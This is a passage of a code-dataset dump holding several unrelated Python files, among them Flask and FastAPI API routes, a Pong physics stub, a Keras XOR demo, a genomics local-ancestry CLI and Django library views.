__current_time","sub_path":"forsun/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"173187614","text":"#coding=utf-8\nfrom flask import jsonify\nfrom flask.ext.restful import Resource, reqparse\nfrom myapi import db, app\nfrom myapi.model.category import CategoryModel\nfrom 
myapi.model.project import ProjectModel\nfrom myapi.model.user import UserModel\nfrom myapi.model.bid import BidModel\nfrom myapi.model.enum import project_status, bid_status\n\nclass Project(Resource):\n def get(self, projectid):\n return ProjectModel.query.get(projectid).serialize()\n\n def post(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('name', type=str, location='json', required=True)\n post_parser.add_argument('timespan', type=str, location='json')\n post_parser.add_argument('requirements', type=str, location='json')\n post_parser.add_argument('bonus', type=int, location='json')\n post_parser.add_argument('description', type=str, location='json')\n post_parser.add_argument('bidderQualifiRequire', type=str, location='json')\n post_parser.add_argument('bidderLocationRequire', type=str, location='json')\n post_parser.add_argument('receipt', type=bool , location='json')\n post_parser.add_argument('receiptDescription', type=str, location='json')\n post_parser.add_argument('userid', type=int, location='json', required=True)\n post_parser.add_argument('cids', type=str, location='json', required=True)\n args = post_parser.parse_args()\n\n project = ProjectModel(args.name, \n args.timespan,\n args.requirements,\n args.bonus,\n args.description,\n args.bidderQualifiRequire,\n args.bidderLocationRequire,\n args.receipt,\n args.receiptDescription)\n\n for id in args.cids.split(','):\n category = CategoryModel.query.get(id)\n project.categorys.append(category)\n\n db.session.add(project)\n\n user = UserModel.query.get(args.userid)\n user.publishedProjects.append(project)\n db.session.commit()\n return project.serialize()\n\n def put(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('id', type=int, location='json', required=True)\n post_parser.add_argument('status', type=int, location='json', required=True)\n args = post_parser.parse_args()\n project = ProjectModel.query.get(args.id)\n project.status = args.status\n db.session.commit()\n return project.serialize()\n\nclass ProjectOneStep(Resource):\n def post(self):\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('name', type=str, location='json', required=True)\n post_parser.add_argument('buyerid', type=int, location='json', required=True)\n post_parser.add_argument('sellerid', type=int, location='json', required=True)\n post_parser.add_argument('cids', type=str, location='json', required=True)\n args = post_parser.parse_args()\n\n project = ProjectModel(args.name)\n project.status = project_status.selectBidder\n\n for id in args.cids.split(','):\n category = CategoryModel.query.get(id)\n project.categorys.append(category)\n\n db.session.add(project)\n\n buyer = UserModel.query.get(args.buyerid)\n buyer.publishedProjects.append(project)\n\n seller = UserModel.query.get(args.sellerid)\n seller.wonProjects.append(project)\n\n bid = BidModel()\n bid.user = seller\n bid.status = bid_status.selectBidder\n\n #project = ProjectModel.query.get(args.projectid)\n project.bidders.append(bid)\n\n db.session.commit()\n\n return project.serialize()\n\n\nclass UserPublishedProjects(Resource):\n def get(self, page):\n parser = reqparse.RequestParser()\n parser.add_argument('userid', type=int, location='args', required=True)\n parser.add_argument('status', type=int, location='args', default=0)\n args = parser.parse_args()\n projects = UserModel.query.get(args.userid).publishedProjects\n\n if args.status:\n projects = projects.filter_by(status = args.status)\n\n projects = 
projects.paginate(page, app.config['POSTS_PER_PAGE'], False)\n return jsonify(total = projects.total,\n pages = projects.pages,\n page = projects.page,\n per_page = projects.per_page,\n has_next = projects.has_next,\n has_prev = projects.has_prev,\n next_num = projects.next_num,\n prev_num = projects.prev_num,\n data=[e.serialize() for e in projects.items])\n\nclass UserParticipateProjects(Resource):\n def get(self, page):\n parser = reqparse.RequestParser()\n parser.add_argument('userid', type=int, location='args', required=True)\n parser.add_argument('status', type=int, location='args', default=0)\n parser.add_argument('winner', type=str, location='args')\n args = parser.parse_args()\n bids = UserModel.query.get(args.userid).bidProjects\n\n if args.status:\n bids = bids.filter(BidModel.project.has(ProjectModel.status == args.status))\n \n if args.winner == 'isMe':\n bids = bids.filter(BidModel.project.has(ProjectModel.winnerid == args.userid))\n\n if args.winner == 'isNotMe':\n bids = bids.filter(BidModel.project.has(ProjectModel.winnerid != args.userid))\n\n bids = bids.paginate(page, app.config['POSTS_PER_PAGE'], False)\n return jsonify(total = bids.total,\n pages = bids.pages,\n page = bids.page,\n per_page = bids.per_page,\n has_next = bids.has_next,\n has_prev = bids.has_prev,\n next_num = bids.next_num,\n prev_num = bids.prev_num,\n data=[e.serialize() for e in bids.items])\n\nfrom sqlalchemy import or_\nclass ProjectList(Resource):\n def get(self, page):\n get_parser = reqparse.RequestParser()\n get_parser.add_argument('cid', type=int, location='args', default=0)\n get_parser.add_argument('keyword', type=str, location='args')\n get_parser.add_argument('status', type=int, location='args', default=0)\n get_parser.add_argument('orderby', type=int, location='args', choices=range(3), default=0)\n get_parser.add_argument('desc', type=int, location='args', choices=range(3), default=0)\n args = get_parser.parse_args()\n \n projects = ProjectModel.query\n\n if args.cid:\n projects = projects.filter( \\\n or_( \\\n ProjectModel.categorys.any(CategoryModel.id == args.cid), \\\n ProjectModel.categorys.any(CategoryModel.parent_id == args.cid), \\\n ProjectModel.categorys.any(CategoryModel.parent.has(CategoryModel.parent_id == args.cid))\n ) \\\n )\n\n if args.keyword:\n projects = projects.filter(ProjectModel.name.contains(args.keyword))\n\n if args.status:\n projects = projects.filter(ProjectModel.status == args.status)\n \n if args.orderby == 1:\n if args.desc == 1:\n projects = projects.order_by(ProjectModel.publishDate.desc())\n else:\n projects = projects.order_by(ProjectModel.publishDate.asc())\n if args.orderby == 2:\n if args.desc == 1:\n projects = projects.order_by(ProjectModel.bonus.desc())\n else:\n projects = projects.order_by(ProjectModel.bonus.asc())\n\n projects = projects.paginate(page, app.config['POSTS_PER_PAGE'], False)\n\n return jsonify(total = projects.total,\n pages = projects.pages,\n page = projects.page,\n per_page = projects.per_page,\n has_next = projects.has_next,\n has_prev = projects.has_prev,\n next_num = projects.next_num,\n prev_num = projects.prev_num,\n data=[e.serialize() for e in projects.items])\n\n","sub_path":"myapi/resources/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"136366630","text":"__author__ = 'Arvie'\n\nfrom State.State import State\n\nimport pygame\n\nimport math\n\n\n# a vector class just to see what it is 
like to make one myself\nclass Vec2:\n def __init__(self, v=None):\n if v is None:\n self.v = [0, 0]\n else:\n self.v = [v[0], v[1]]\n\n def __add__(self, other):\n return Vec2([self.v[0] + other.v[0], self.v[1] + other.v[1]])\n\n def __sub__(self, other):\n return Vec2([self.v[0] - other.v[0], self.v[1] - other.v[1]])\n\n # scaler multiplication\n def __mul__(self, other):\n return Vec2([self.v[0] * other, self.v[1] * other])\n\n def dot(self, v2):\n return (self.v[0] * v2.v[0]) + (self.v[1] * v2.v[1])\n\n def norm(self):\n n = math.sqrt(self.v[0]**2 + self.v[1]**2)\n return [self.v[0]/n, self.v[1]/n]\n\n\n# Overall game settings\nclass GameSettings:\n def __init__(self):\n self.ball_start_speed = 1\n\n\nclass HitableObject:\n def __init__(self):\n self.xy = Vec2()\n self.w = 0\n self.h = 0\n self.vel = Vec2()\n self.inv_mass = 0 # mass of zero is unmovable i.e. infinite mass\n self.restitution = 1\n\n # code modified from\n # http://gamedevelopment.tutsplus.com/tutorials/how-to-create-a-custom-2d-physics-engine-the-basics-and-impulse-resolution--gamedev-6331\n def collision(self, other_obj):\n # Calculate relative velocity\n rv = Vec2(other_obj.vel - self.vel)\n\n # Calculate relative velocity in terms of the normal direction\n vel_along_normal = rv.dot(self.vel.norm)\n\n\n # Do not resolve if velocities are separating\n if vel_along_normal > 0:\n return\n\n # Calculate restitution\n e = min(self.restitution, other_obj.restitution)\n\n # Calculate impulse scalar\n j = -(1 + e) * vel_along_normal\n j /= self.inv_mass + other_obj.inv_mass\n\n # Apply impulse\n impulse = Vec2(self.vel.norm * j)\n self.vel -= self.inv_mass * impulse\n other_obj.vel += other_obj.inv_mass * impulse\n\n\nclass Paddle(HitableObject):\n 'todo'\n\n\nclass Ball(HitableObject):\n 'Todo'\n\n def server(self):\n 'TODO' # resets ball\n\n\nclass Wall(HitableObject):\n 'TODO'\n\n\n","sub_path":"Pong/src/pong_main.py","file_name":"pong_main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"372046771","text":"\nimport typing as t\n\nfrom fastapi import APIRouter, Depends, Request, Response\n\nfrom app.api.api_v1.crud.user import (\n create_user,\n delete_user,\n edit_user,\n get_user,\n get_users,\n)\nfrom app.api.api_v1.schemas.user import User, UserCreate, UserEdit\nfrom app.core.auth import get_current_active_superuser\n\nusers_router = r = APIRouter()\n\n\n@r.get(\n \"/users\",\n response_model=t.List[User],\n response_model_exclude_none=True,\n)\nasync def users_list(\n request: Request,\n response: Response,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Get all users\n \"\"\"\n users = get_users(request.state.db)\n # This is necessary for react-admin to work\n response.headers[\"Content-Range\"] = f\"0-9/{len(users)}\"\n return users\n\n\n@r.get(\"/users/me\", response_model=User, response_model_exclude_none=True)\nasync def user_me(request: Request):\n \"\"\"\n Get own user\n \"\"\"\n return request.state.current_active_user\n\n\n@r.get(\n \"/users/{user_id}\",\n response_model=User,\n response_model_exclude_none=True,\n)\nasync def user_details(\n request: Request,\n user_id: int,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Get any user details\n \"\"\"\n user = get_user(request.state.db, user_id)\n return user\n # return encoders.jsonable_encoder(\n # user, skip_defaults=True, exclude_none=True,\n # )\n\n\n@r.post(\"/users\", response_model=User, 
response_model_exclude_none=True)\nasync def user_create(\n request: Request,\n user: UserCreate,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Create a new user\n \"\"\"\n return create_user(request.state.db, user)\n\n\n@r.put(\"/users/{user_id}\", response_model=User, response_model_exclude_none=True)\nasync def user_edit(\n request: Request,\n user_id: int,\n user: UserEdit,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Update existing user\n \"\"\"\n return edit_user(request.state.db, user_id, user)\n\n\n@r.delete(\"/users/{user_id}\", response_model=User, response_model_exclude_none=True)\nasync def user_delete(\n request: Request,\n user_id: int,\n current_user=Depends(get_current_active_superuser),\n):\n \"\"\"\n Delete existing user\n \"\"\"\n return delete_user(request.state.db, user_id)\n","sub_path":"api/app/api/api_v1/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"150168760","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n\n\n# 1. 데이터\nx_data = np.array([[0, 0], [1, 0], [0, 1], [1, 1]])\ny_data = np.array([0, 1, 1, 0])\n\nprint(x_data.shape)\nprint(y_data.shape)\n\n\n# 2. 모델\n# model = LinearSVC()\n# model = SVC()\n# model = KNeighborsClassifier(n_neighbors = 1)\nmodel = Sequential()\n\nmodel.add(Dense(1000, input_shape = (2, )))\nmodel.add(Dense(1, activation = 'sigmoid'))\n\nmodel.summary()\n\n\n# 3. 훈련\nmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['acc'])\nmodel.fit(x_data, y_data, epochs = 100, batch_size = 1)\n\n\n# 4. 
평가 예측\nres = model.evaluate(x_data, y_data)\n\nx_test = np.array([[0, 0], [1, 0], [0, 1], [1, 1]])\ny_predict = model.predict(x_test)\n\n# acc = accuracy_score([0, 1, 1, 0], y_predict) # keras의 evaluate와 동일하다고 보면 됨; accuracy_score\n\n# print(x_test, \"의 예측 결과 : \", y_predict)\n# print(\"acc : \", acc)\n\nprint(\"acc : \", res[1])\nprint(y_predict)","sub_path":"ML/m04_xor4_keras.py","file_name":"m04_xor4_keras.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"201700584","text":"import math\nimport sys\nfrom collections import deque, Counter\n \nimport collections\n\nNOTATION = '0123456789ABCDEF' \n\ndef numeral_system(number, base): # 10진수 n진수로의 변환\n q, r = divmod(number, base) \n n = NOTATION[r] \n return numeral_system(q, base) + n if q else n\n\ndef solution(n, t, m, p):\n maxs=\"\"\n for i in range(t*m):\n maxs+=numeral_system(i, n)\n # n 진법 튜브의 순서 p, 게임에 참가하는 인원 m , 미리 구할 숫자의 갯수 t\n \n answer = ''\n \n for i in range(t):\n answer+=maxs[i*m+p-1]\n return answer\n","sub_path":"2_20201127.py","file_name":"2_20201127.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75498495","text":"from xlrd import open_workbook\nimport xlsxwriter as wx\nfrom collections import Counter\n\nproductid = ['productid', '贷款产品子编号']\nareacode = ['areacode', '区域']\nfor i in range(12):\n filepath = str(i) + '.xls'\n rb = open_workbook(filepath)\n table = rb.sheets()[0]\n productid = productid + [\n i for i in table.col_values(0) if i != '' and i != productid[0] and\n i != productid[1]]\n areacode = areacode + [\n i for i in table.col_values(1) if i != '' and\n i != areacode[0] and i != areacode[1]]\n\n\ntotal = [str(productid[i]) + str(areacode[i]) for i in range(len(areacode))]\nmy_count = Counter(total)\nfor key in my_count:\n if my_count[key] > 1:\n print(key, my_count[key])\n print('\\n')\n\n\nf = wx.Workbook('area_total.xlsx')\nsheet1 = f.add_worksheet()\n\nfor i in range(len(areacode)):\n sheet1.write(i, 0, productid[i])\n sheet1.write(i, 1, areacode[i])\nf.close()\n","sub_path":"area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"635224511","text":"import argparse\nimport os\nimport shutil\nimport nltk\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom dpp_nets.utils.language import Vocabulary, BeerDataset, custom_collate\nfrom dpp_nets.layers.layers import ChunkTrainer\n\n\nparser = argparse.ArgumentParser(description='marginal_chunk Krause Trainer')\nparser.add_argument('-a', '--aspect', type=str, choices=['aspect1', 'aspect2', 'aspect3', 'all', 'short'],\n help='what is the target?', required=True)\nparser.add_argument('-m', '--mode', type=str, choices=['words', 'chunks', 'sents'],\n help='what is the mode?', required=True)\nparser.add_argument('-b', '--batch-size', default=100, type=int,\n metavar='N', help='mini-batch size (default: 50)')\nparser.add_argument('--epochs', default=30, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--lr', '--learning_rate', default=1e-3, type=float,\n metavar='', help='initial learning rate')\nparser.add_argument('--reg', type=float, required=True,\n metavar='reg', help='regularization constant')\nparser.add_argument('--reg_mean', 
type=float, required=True,\n metavar='reg_mean', help='regularization_mean')\nparser.add_argument('-r', '--remote', type=int,\n help='training locally or on cluster?', required=True)\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n\ndef main():\n\n global vocab, args\n\n lowest_loss = 100 # arbitrary high number as upper bound for loss\n\n # Check for GPU\n args = parser.parse_args()\n args.cuda = torch.cuda.is_available()\n \n # Set Seed\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n # Set-up data\n if args.remote:\n train_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + args.mode + '.txt.gz'\n val_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.heldout.' + args.mode + '.txt.gz'\n embd_path = '/home/paulusm/data/beer_reviews/' + 'review+wiki.filtered.200.txt.gz'\n word_path = '/home/paulusm/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + 'words.txt.gz'\n else:\n train_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + args.mode + '.txt.gz'\n val_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.heldout.' + args.mode + '.txt.gz'\n embd_path = '/Users/Max/data/beer_reviews/' + 'review+wiki.filtered.200.txt.gz'\n word_path = '/Users/Max/data/beer_reviews/' + 'reviews.' + args.aspect + '.train.' + 'words.txt.gz'\n\n # Set-up vocabulary\n vocab = Vocabulary()\n vocab.loadPretrained(embd_path)\n vocab.setStops()\n vocab.loadCorpus(word_path)\n vocab.updateEmbedding()\n vocab.setCuda(args.cuda)\n print('set up vocabulary')\n\n # Set up datasets and -loader\n train_set = BeerDataset(train_path, vocab)\n val_set = BeerDataset(val_path, vocab)\n kwargs = {'num_workers': 0, 'pin_memory': True} if args.cuda else {}\n\n my_collate = custom_collate(vocab, args.cuda)\n train_loader = torch.utils.data.DataLoader(train_set, collate_fn=my_collate, batch_size=args.batch_size, shuffle=True, **kwargs)\n val_loader = torch.utils.data.DataLoader(train_set, collate_fn=my_collate, batch_size=args.batch_size, **kwargs)\n\n # Network parameters\n EMBD_DIM = 200\n KERNEL_DIM = 200\n HIDDEN_DIM = 500\n ENC_DIM = 200\n TARGET_DIM = 3 if args.aspect in set(['all', 'short']) else 1\n\n # Conventional trainer\n trainer = ChunkTrainer(EMBD_DIM, HIDDEN_DIM, KERNEL_DIM, ENC_DIM, TARGET_DIM)\n trainer.activation = nn.Sigmoid()\n trainer.reg = args.reg\n trainer.reg_mean = args.reg_mean\n\n print(\"created trainer\")\n\n # Set-up optimizer\n params = [{'params': vocab.EmbeddingBag.parameters()}, {'params': trainer.parameters()}]\n optimizer = torch.optim.Adam(params, lr=args.lr)\n\n ### Loop\n for epoch in range(args.epochs):\n\n for t, batch in enumerate(train_loader):\n pass\n\n\ndef train(loader, trainer, optimizer):\n\n trainer.train()\n\n for t, batch in enumerate(loader):\n\n reviews, target = batch\n\n loss = trainer(reviews, target)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #print(\"trained one batch\")\n\ndef validate(loader, trainer):\n\n trainer.eval()\n\n total_loss = 0.0\n total_pred_loss = 0.0\n total_reg_loss = 0.0\n\n for i, batch in enumerate(loader, 1):\n\n review, target = batch\n\n trainer(review, target)\n\n loss = trainer.loss.data[0]\n pred_loss = trainer.pred_loss.data[0]\n reg_loss = trainer.reg_loss.data[0]\n\n delta = loss - total_loss\n total_loss += (delta / i)\n delta = pred_loss - total_pred_loss \n total_pred_loss += (delta / i)\n delta = reg_loss - 
total_reg_loss\n total_reg_loss += (delta / i)\n\n # print(\"validated one batch\")\n\n return total_loss, total_pred_loss, total_reg_loss\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR multiplied by factor 0.1 for every 10 epochs\"\"\"\n if not ((epoch + 1) % 10):\n factor = 0.1\n for param_group in optimizer.param_groups:\n param_group['lr'] = param_group['lr'] * factor\n\ndef log(epoch, loss, pred_loss, reg_loss):\n\n string = str.join(\" | \", ['Epoch: %d' % (epoch), 'V Loss: %.5f' % (loss), \n 'V Pred Loss: %.5f' % (pred_loss), 'V Reg Loss: %.5f' % (reg_loss)])\n\n if args.remote:\n destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'log_marginal.txt'\n else:\n destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'log_marginal.txt'\n\n\n with open(destination, 'a') as log:\n log.write(string + '\\n')\n\ndef save_checkpoint(state, is_best, filename='marginal_chunk_checkpoint.pth.tar'):\n \"\"\"\n State is a dictionary that cotains valuable information to be saved.\n \"\"\"\n if args.remote:\n destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_ckp.pth.tar'\n else:\n destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_ckp.pth.tar'\n\n torch.save(state, destination)\n\n if is_best:\n if args.remote:\n best_destination = '/home/paulusm/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_best_ckp.pth.tar'\n else:\n best_destination = '/Users/Max/checkpoints/beer_reviews/' + str(args.aspect) + str(args.mode) + 'reg' + str(args.reg) + 'reg_mean' + str(args.reg_mean) + 'lr' + str(args.lr) + 'marginal_best_ckp.pth.tar'\n\n shutil.copyfile(destination, best_destination)\n\nif __name__ == '__main__':\n main()\n \n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"480120327","text":"import admix\nimport subprocess\nimport dapgen\nimport os\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom ._utils import log_params\n\n\ndef lanc(\n pfile: str,\n ref_pfile: str,\n ref_pop_col: str,\n ref_pops: str,\n out: str,\n):\n log_params(\"lanc\", locals())\n\n sample_dset = admix.io.read_dataset(pfile=pfile)\n ref_dset = admix.io.read_dataset(pfile=ref_pfile)\n\n assert set(sample_dset.snp.index) == set(ref_dset.snp.index), (\n \"`pfile` and `ref_pfile` must have the same snp index\"\n \"(snp match feature coming soon).\"\n )\n\n ref_dsets = [\n ref_dset[:, (ref_dset.indiv[ref_pop_col] == pop).values] for pop in ref_pops\n ]\n est = admix.ancestry.lanc(sample_dset=sample_dset, ref_dsets=ref_dsets)\n admix.data.Lanc(array=est).write(out)\n\n\ndef lanc_count(lanc: str, out: str, n_anc: int = None):\n \"\"\"Count the number / proportion of local ancestries for each individual\n\n Parameters\n ----------\n lanc : str\n path to the lanc file, this can be a .lanc file, a wildcard of .lanc files,\n or a directory 
containing .lanc files. If the corresponding .psam file is\n present, the .psam file will be used as the individual list.\n out : str\n path to the output file\n n_anc : int\n number of ancestral populations in the data\n \"\"\"\n log_params(\"lanc-count\", locals())\n if lanc.endswith(\".lanc\"):\n lanc_path = [lanc]\n elif \"*\" in lanc:\n lanc_path = glob.glob(lanc)\n elif os.path.isdir(lanc):\n lanc_path = [p for p in glob.glob(lanc + \"/*.lanc\")]\n else:\n raise ValueError(\"Unable to parse lanc pathname\")\n\n admix.logger.info(f\"Found {len(lanc_path)} lanc files: {','.join(lanc_path)}\")\n # read psam if available\n psam_path = [p.replace(\".lanc\", \".psam\") for p in lanc_path]\n\n if all(os.path.exists(p) for p in psam_path):\n # check all psam files have the same individual ID\n psam_indiv = [dapgen.read_psam(p).index for p in psam_path]\n assert all(\n psam_indiv[0].equals(i) for i in psam_indiv[1:]\n ), \"Individuals in psam files do not match\"\n indiv_list = psam_indiv[0].values\n elif not any(os.path.exists(p) for p in psam_path):\n indiv_list = None\n else:\n raise ValueError(\"either .psam all exists or none exists\")\n\n lanc_mat = admix.data.Lanc(lanc_path[0])\n n_indiv = lanc_mat.n_indiv\n if indiv_list is not None:\n assert n_indiv == len(\n indiv_list\n ), \"Number of individuals in lanc and psam files do not match\"\n else:\n indiv_list = np.arange(n_indiv).astype(str)\n\n lanc_count = lanc_mat.lanc_count()\n if n_anc is not None:\n assert (\n lanc_count.shape[1] == n_anc\n ), \"Number of ancestral populations do not match\"\n else:\n n_anc = lanc_count.shape[1]\n admix.logger.info(f\"Inferred number of ancestral populations: {n_anc}\")\n\n for p in lanc_path[1:]:\n lanc_count += admix.data.Lanc(p).lanc_count(n_anc=n_anc)\n\n lanc_prop = lanc_count / lanc_count.sum(axis=1, keepdims=True)\n admix.logger.info(f\"Writing lanc count file: {out}\")\n\n count_cols = [f\"COUNT{i + 1}\" for i in range(n_anc)]\n prop_cols = [f\"PROP{i+1}\" for i in range(n_anc)]\n df_res = pd.DataFrame(\n data=np.concatenate([lanc_count, lanc_prop], axis=1),\n index=indiv_list,\n columns=count_cols + prop_cols,\n )\n\n df_res[count_cols] = df_res[count_cols].astype(int)\n df_res.index.name = \"indiv\"\n df_res.to_csv(out, sep=\"\\t\", float_format=\"%.4g\")\n\n\ndef lanc_convert(pfile: str, out: str, rfmix: str = None, raw: str = None):\n \"\"\"Convert local ancestry inference results (e.g. RFmix .msp.tsv) to a .lanc file\n\n Parameters\n ----------\n pfile : str\n Path to the pfile. 
The path is without the .pgen suffix\n out : str\n Path to the output file\n rfmix : str\n Path to the rfmix .msp.tsv file,\n raw : str\n Path to the raw file\n \"\"\"\n log_params(\"lanc-convert\", locals())\n\n # only one of rfmix and raw should be specified\n assert (rfmix is None) + (\n raw is None\n ) == 1, \"Only one of rfmix and raw should be specified\"\n if rfmix is not None:\n geno, df_snp, df_indiv = dapgen.read_pfile(pfile, phase=True)\n admix.logger.info(f\"Reading rfmix file: {rfmix}\")\n lanc = admix.io.read_rfmix(\n path=rfmix,\n df_snp=df_snp,\n df_indiv=df_indiv,\n )\n admix.logger.info(f\"Obtaining local ancestry {lanc}\")\n admix.logger.info(f\"Writing lanc file: {out}\")\n lanc.write(out)\n\n if raw is not None:\n assert False, \"raw not implemented yet\"\n\n\ndef lanc_impute(pfile: str, ref_pfile: str, out: str = None):\n \"\"\"Impute the local ancestry for `pfile` using `ref_pfile`\n\n Parameters\n ----------\n pfile : str\n Path to the pfile\n ref_pfile : str\n Path to the reference pfile\n out : str\n Path to the output pfile (default to pfile + \".lanc\")\n \"\"\"\n log_params(\"lanc-impute\", locals())\n\n # check .lanc does not exist\n assert not os.path.exists(pfile + \".lanc\"), \"`pfile` already has a .lanc file\"\n\n sample_dset = admix.io.read_dataset(pfile=pfile)\n ref_dset = admix.io.read_dataset(pfile=ref_pfile)\n ref_lanc = admix.data.Lanc(ref_pfile + \".lanc\")\n\n sample_lanc = ref_lanc.impute(\n ref_dset.snp[[\"CHROM\", \"POS\"]].values, sample_dset.snp[[\"CHROM\", \"POS\"]].values\n )\n if out is None:\n out = pfile + \".lanc\"\n assert not os.path.exists(out), f\"out={out} already exists\"\n sample_lanc.write(out)\n","sub_path":"admix/cli/_lanc.py","file_name":"_lanc.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"170858511","text":"import re\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.db import IntegrityError\nfrom django.db.models import Q\nfrom django.http import Http404\nfrom django.shortcuts import redirect, get_object_or_404, render_to_response, render\nfrom django.views.generic import ListView, CreateView, DeleteView, UpdateView, DetailView, TemplateView\nfrom invitations.admin import Invitation\nfrom registration.forms import User\n\nfrom user_catalog.forms import LendingForm\nfrom user_catalog.models import LibraryFriend, BookExchangeEvent\nfrom library.models import BookInstance\nfrom django.utils import timezone\n\n\nclass LibraryList(ListView):\n model = BookInstance\n template_name = 'bookinstance_list.html'\n success_url = 'library_list'\n\n def get_queryset(self):\n if self.request.user.is_authenticated():\n query = self.request.GET.get('query', '')\n obj = BookInstance.objects.filter(reader=self.request.user)\n if query:\n if self.request.GET['searchby'] == 'Title':\n return obj.filter(book__title__icontains=query)\n else:\n return obj.filter(book__author__icontains=query)\n return obj\n return None\n\n def get_context_data(self, **kwargs):\n context = super(LibraryList, self).get_context_data(**kwargs)\n if self.request.user.is_authenticated():\n in_library = self.get_queryset().filter(lent_outside=False, lent_to_someone__isnull=True)\n outside = self.get_queryset().filter(Q(lent_outside=True) | Q(lent_to_someone__isnull=False))\n borrowed = BookInstance.objects.filter(lent_to_someone=self.request.user)\n 
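            # surface all three shelves to the template: books on hand, books lent out, and books borrowed from others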
context.update({'queryset': in_library, 'owner': True, 'outside': outside, 'borrowed': borrowed })\n return context\n\n\nclass BookInstanceCreate(CreateView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_form.html'\n fields = ['reader', 'book', 'currently_reading', 'finished', 'comment']\n\n def get_form(self, form_class):\n \"\"\"\n Returns an instance of the form to be used in this view.\n \"\"\"\n form = form_class(**self.get_form_kwargs())\n lib_friends = LibraryFriend.objects.filter(user=self.request.user)\n mails = [lib_friend.mail for lib_friend in lib_friends]\n mails.append(self.request.user.email)\n form.fields['reader'].queryset = User.objects.filter(email__in=mails)\n return form\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data()\n context.update({'create': True})\n return context\n\n\nclass BookInstanceDelete(DeleteView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_delete.html'\n\n\nclass BookInstanceUpdate(UpdateView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_form.html'\n fields = ['currently_reading', 'finished', 'comment']\n\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super(UpdateView, self).post(request, *args, **kwargs)\n\n\nclass BookInstanceDetail(DetailView):\n model = BookInstance\n success_url = reverse_lazy('library_list')\n template_name = 'user_catalog/bookinstance_detail.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data()\n if self.request.user.is_authenticated():\n if self.request.user == kwargs['object'].reader:\n context.update({'owner': True})\n # Lending\n lending_form = LendingForm()\n lending_form.fields['lend_to_someone'].queryset = User.objects.filter(~Q(pk=self.request.user.pk))\n\n context.update({'lending_form': lending_form})\n # Echange history\n instance = BookInstance.objects.get(pk=self.kwargs['pk'])\n history = BookExchangeEvent.objects.filter(bookinstance=instance)\n context.update({'history': 